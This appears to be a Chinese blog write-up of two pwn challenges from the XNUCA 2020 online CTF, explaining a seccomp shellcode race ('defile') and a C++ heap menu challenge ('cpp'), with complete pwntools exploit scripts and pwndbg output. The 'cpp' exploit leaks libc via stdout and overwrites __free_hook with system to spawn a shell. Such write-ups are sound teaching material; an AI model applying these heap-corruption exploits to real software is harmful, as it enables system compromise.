Xnuca2020线上赛l

Xnuca2020线上赛

比赛时pwn题都是ruan解的tttttql😍，我TM直接化身ruan师傅迷弟。不亏是中科院，收获满满。

defile

这题在听了ruan师傅讲解之后才终于搞明白了🙆‍♂️
题目给出了源码，编译好的elf文件，makefile，查看makefile发现gcc defile.c -o defile -lseccomp -g，开了seccomp以及给出了调试符号，意味着我们可以源码调试了。

接下来就是阅读源代码了，逻辑大概是这样的（如有错误请务必指正）：
程序首先mmap一块较大(4096)的shared空间，接下来fork出子进程。该子进程的任务是首先让我们向shared输入4094大小的内容，之后循环(while(1))的fork出孙子进程(相对于父进程而言)，fork出的孙子进程会执行我们的输入也即shellcode，执行完后就exit(0)，之后子进程在继续fork，循环上述的执行。

这里要注意的一点是再孙子进程跳去执行shellcode的时候:

uint64_t targetaddr = (uint64_t)shared + (i % 2) * ((4096 - 2) / 2);
                __asm__(
                    "mov $0xdeadbeefdeadbeef, %%rax\n\t"
                    "mov $0xdeadbeefdeadbeef, %%rbx\n\t"
                    "mov $0xdeadbeefdeadbeef, %%rcx\n\t"
                    "mov $0xdeadbeefdeadbeef, %%rdi\n\t"
                    "mov $0xdeadbeefdeadbeef, %%rsi\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r8\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r9\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r10\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r11\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r12\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r13\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r14\n\t"
                    "mov $0xdeadbeefdeadbeef, %%r15\n\t"
                    "jmp *%%rdx\n\t"
                    :
                    :"d"(targetaddr)
                    :
                );

可见是有两个入口地址的一个是shared，另一个是shared+2046，也即4096的空间里应该有我们两部分相同的shellcode。

父进程所作的就是通过random生成一段128长度的随机数，并且进行128轮次的循环。每一轮所做的就是比较shared+4095和key[i]的大小，如果相等就往shared+offset(也是随机数)写入0xcccccccccccccccc来破坏我们的shellcode，然后再比较shared+0x4094是否为1，相等则才进行下一轮的比较。执行完128轮之后程序会从pipe里读出128的内容于key比较，相同就给我们flag了。

这样看下来我们的shellcode所要完成的功能为：

1.shared+4095==key[i]，需要循环爆破。

2.shared+4095==1

3.write(pipe,&key[i],1)。

由于0xcccccccccccccccc的写入我们可以有这样的思路：
首先从0开始循环增加的向shared+4095写入，每次写入之后都对shellcode进行检查，如果没有0xcccccccccccccccc的出现说明还没爆破到，若有0xcccccccccccccccc说明爆破到了key，之后由于我们再该空间内有两端相同的shellcode，因此可以通过偏移的相对位置利用未被写入0xcccccccccccccccc的那段来修复写入0xcccccccccccccccc的那段shellcode，之后构造write(pipe,&key[i],1)向管道写入Key值，之后exit()。

对应的汇编如下：

code = """
	and rdx,0xfffffffffffff000
	add rdx,0xe
	jmp rdx
	xor rbx,rbx
	xor rax,rax
	and rdx,0xfffffffffffff000
	mov byte ptr [rdx+0xfff],bl
loop_:
	call check
	mfence
	call check
	cmpw cx,0x200
	jne find
	inc bl
	mov byte ptr [rdx+0xfff],bl
	cmpb bl,0
	jne loop_
find:
	mov ax,cx
	cmpw cx,0x100
	jle l1
	sub ax,0x100
	jmp l2
l1:
	add ax,0x100
l2:
	mov r11,[rdx+rax*8]
	mov qword ptr [rdx+rcx*8],r11
	push rbx
	mov rsi,rsp
	mov edi,4
	mov r12,rdx

	xor rdx,rdx
	inc rdx
	mov rax,rdx
	syscall

	mov byte ptr [r12+0xffe],1

	xor rdi,rdi
	mov rax,0xe7
	syscall
check:
	xor rcx,rcx
find_cc:
	movabsq	r11,-3689348814741910324
	cmpq qword ptr [rdx + rcx*8],r11
	je find_
	inc rcx
	cmpw cx,0x200
	jne find_cc
	ret
find_:
	ret
"""

开始的时候我们只call check了一次，这样会出现一个问题就是当我们爆破到了key但call check时，父进程还没完成0xcccccccccccccccc的写入导致call check返回0，使得写入的shared+4095会比key大1，为了解决父子进程这种可能的速度差异，我们选择使用了两次call check。

完整exp:

from pwn import *
context.log_level='debug'
context.arch='amd64'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))

def main(host,port=40001):
    global p
    if host:
        p=remote(host,port)
        p.recvuntil("INPUT YOUR TOKEN:")
        p.send("icq95bbff617706a68d47723be2f12b7")
    else:
        p=process("./defile")
        # debug(0x1A4F)
        # pause()
    # pause()
    # gdb.attach(p)

    shellcode=code = """
    	and rdx,0xfffffffffffff000
    	add rdx,0xe
    	jmp rdx
    	xor rbx,rbx
    	xor rax,rax
    	and rdx,0xfffffffffffff000
    	mfence
    	mov byte ptr [rdx+0xfff],bl
    	mfence
    	mfence
    loop_:
        call check
        mfence
    	call check
    	cmpw cx,0x200
    	jne find
    	inc bl
    	mfence
    	mov byte ptr [rdx+0xfff],bl
    	mfence
    	cmpb bl,0
    	jne loop_
    find:
    	mov ax,cx
    	cmpw cx,0x100
    	jle l1
    	sub ax,0x100
    	jmp l2
    l1:
    	add ax,0x100
    l2:
    	mov r11,[rdx+rax*8]
    	mov qword ptr [rdx+rcx*8],r11
    	push rbx
    	mov rsi,rsp
    	mov edi,4
    	mov r12,rdx

    	xor rdx,rdx
    	inc rdx
    	mov rax,rdx
    	syscall

    	mov byte ptr [r12+0xffe],1

    	xor rdi,rdi
    	mov rax,0xe7
    	syscall
    check:
    	xor rcx,rcx
    find_cc:
    	movabsq	r11,-3689348814741910324
    	cmpq qword ptr [rdx + rcx*8],r11
    	je find_
    	inc rcx
    	cmpw cx,0x200
    	jne find_cc
    	ret
    find_:
    	ret
    """
    p.recvuntil(":")
    code=asm(shellcode).ljust(2046,'\x90')
    # code=(asm(shellcode)).encode('hex')
    p.send('\x90'+code+'\x90'*2+code[:-11]+'\x00'*10)

    # p.recvuntil("SUCCEED")

    # gdb.attach(p)
    p.interactive()

if __name__ == '__main__':
    # main("39.97.171.121")
    for i in range(0x20):
        try:
            main(0)
        except:
            p.close()

cpp

Heap exploiting is so boring .

一道c++写的菜单题，由于没有对指针的清零导致我们可以一直dele，因此我们可以一直dele来填满tecache，从而进入fastibin。

题目限制了malloc的size，但我们可以利用basic_string扩容的规则来触发malloc_consolidate，来得到存放有main_arena的bins。

create_des()
create_des()
create_des()
write_des('a'*0x30)
for i in range(8):
    del_des()
write_des('a'*0x60)
for i in range(8):
    del_des()
write_des('a'*0x70)
for i in range(8):
    del_des()
write_des('a'*0x50)
for i in range(8):
    del_des()
write_des('a'*0x500)

效果：

pwndbg> bins
tcachebins
0x20 [  2]: 0x555a28604e90 ◂— 0x555a28604e90
0x30 [  1]: 0x555a28604f60 ◂— 0x0
0x40 [  7]: 0x555a28604eb0 —▸ 0x7f6268435cd0 (main_arena+144) —▸ 0x7f6268435cc0 (main_arena+128) —▸ 0x7f6268435cb0 (main_arena+112) —▸ 0x7f6268435ca0 (main_arena+96) —▸ 0x555a28605870 ◂— 0x0
0x50 [  1]: 0x555a28604f90 ◂— 0x0
0x60 [  7]: 0x555a28605160 —▸ 0x555a28604ea0 ◂— 0x0
0x70 [  7]: 0x555a28605070 —▸ 0x7f6268435de0 (main_arena+416) —▸ 0x7f6268435dd0 (main_arena+400) —▸ 0x7f6268435dc0 (main_arena+384) —▸ 0x7f6268435db0 (main_arena+368) —▸ 0x7f6268435da0 (main_arena+352) —▸ 0x7f6268435d90 (main_arena+336) —▸ 0x7f6268435d80 (main_arena+320) ◂— ...
0x80 [  7]: 0x555a286050e0 ◂— 0x0
0x90 [  1]: 0x555a28604fe0 ◂— 0x0
0x100 [  1]: 0x555a286051c0 ◂— 0x0
0x1f0 [  1]: 0x555a286052c0 ◂— 0x0
0x3d0 [  1]: 0x555a286054b0 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0x40: 0x555a28604ea0 —▸ 0x7f6268435cd0 (main_arena+144) ◂— 0x555a28604ea0
0x150: 0x555a28605060 —▸ 0x7f6268435de0 (main_arena+416) ◂— 0x555a28605060 /* '`P`(ZU' */
largebins
empty

之后就是劫持stdout泄露了，利用small bin和0x40的tecache的overlop改main_arena的后低两个字节，但要先把0x20的tecache申请出来。

leak的时候有个问题要注意：

pwndbg> bins
tcachebins
0x30 [  1]: 0x561f2bafef60 ◂— 0x0
0x40 [  7]: 0x561f2bafeeb0 —▸ 0x7fc5c83ae758 (_IO_2_1_stderr_+216) —▸ 0x7fc5c83aa2a0 (_IO_file_jumps) ◂— 0x0
0x50 [  1]: 0x561f2bafef90 ◂— 0x0
0x60 [  7]: 0x561f2baff160 —▸ 0x561f2bafeea0 ◂— 0x0
0x70 [  7]: 0x561f2baff070 —▸ 0x7fc5c83adde0 (main_arena+416) —▸ 0x7fc5c83addd0 (main_arena+400) —▸ 0x7fc5c83addc0 (main_arena+384) —▸ 0x7fc5c83addb0 (main_arena+368) —▸ 0x7fc5c83adda0 (main_arena+352) —▸ 0x7fc5c83add90 (main_arena+336) —▸ 0x7fc5c83add80 (main_arena+320) ◂— ...
0x80 [  7]: 0x561f2baff0e0 ◂— 0x0
0x90 [  1]: 0x561f2bafefe0 ◂— 0x0
0x100 [  1]: 0x561f2baff1c0 ◂— 0x0
0x1f0 [  1]: 0x561f2baff2c0 ◂— 0x0
0x3d0 [  1]: 0x561f2baff4b0 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x561f2bafeec0 —▸ 0x7fc5c83adca0 (main_arena+96) ◂— 0x561f2bafeec0
smallbins
0x150: 0x561f2baff060 —▸ 0x7fc5c83adde0 (main_arena+416) ◂— 0x561f2baff060
largebins
empty

pwndbg> x/20gx 0x561f2bafeeb0-0x10
0x561f2bafeea0:	0x0000000000000000	0x0000000000000021
0x561f2bafeeb0:	0x00007fc5c83ae758	0x00007fc5c83adcd0
0x561f2bafeec0:	0x6161616161616161	0x0000000000000021
0x561f2bafeed0:	0x00007fc5c83adca0	0x00007fc5c83adca0

在改了main_arena之后unsortedbin里的bin和0x40的第一个tecache是overlop的，这时如果我们直接取0x40的tecache和话就应注意不要改坏unsorted bin的结构，或者我们可以先把unsortedbin申请空在取0x40的tecache，这样就没什么问题了。

exp:

from pwn import *
context.log_level='debug'

def cmd(command):
    p.recvuntil("[B]ye")
    p.send(str(command))

def create_des():
    cmd('C')

def write_des(content):
    cmd('W')
    sleep(0.1)
    p.sendline(content)

def del_des():
    cmd('D')

def main(host,port=1234):
    global p
    if host:
        p=remote(host,port)
    else:
        p=process("./cpp",env={"LD_PRELOAD":"/home/an9ela/glibc-all-in-one/libs/2.27-3ubuntu1.2_amd64/libc-2.27.so"})


    create_des()
    create_des()
    create_des()
    write_des('a'*0x30)
    for i in range(8):
        del_des()
    write_des('a'*0x60)
    for i in range(8):
        del_des()
    write_des('a'*0x70)
    for i in range(8):
        del_des()
    write_des('a'*0x50)
    for i in range(8):
        del_des()
    write_des('a'*0x500)
    write_des('\x00'*8)
    write_des('\x00'*8)
    # for i in range(4):
	# 	del_des()
    gdb.attach(p)
    stdout=int(raw_input("input: "),16)
    write_des(p16(stdout-8))
    write_des('\x00')
    write_des(p64(0)*3+p64(0x21)+'\x00'*0x10)
    write_des('a'*8+p64(0xfbad1800)+p64(0)*3+'\x00')
    libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ed8b0
    success("libc: "+hex(libc.address))

    write_des(p64(libc.sym['__free_hook']))
    write_des('a'*0x60)
    write_des(p64(libc.sym['system'])+'\x00'*0x58)
    write_des('/bin/sh'+'\x00'*0x20)
    gdb.attach(p)

    p.interactive()

if __name__ == '__main__':
    libc=ELF("/home/an9ela/glibc-all-in-one/libs/2.27-3ubuntu1.2_amd64/libc-2.27.so")
    main(0)

赏

谢谢你请我吃糖果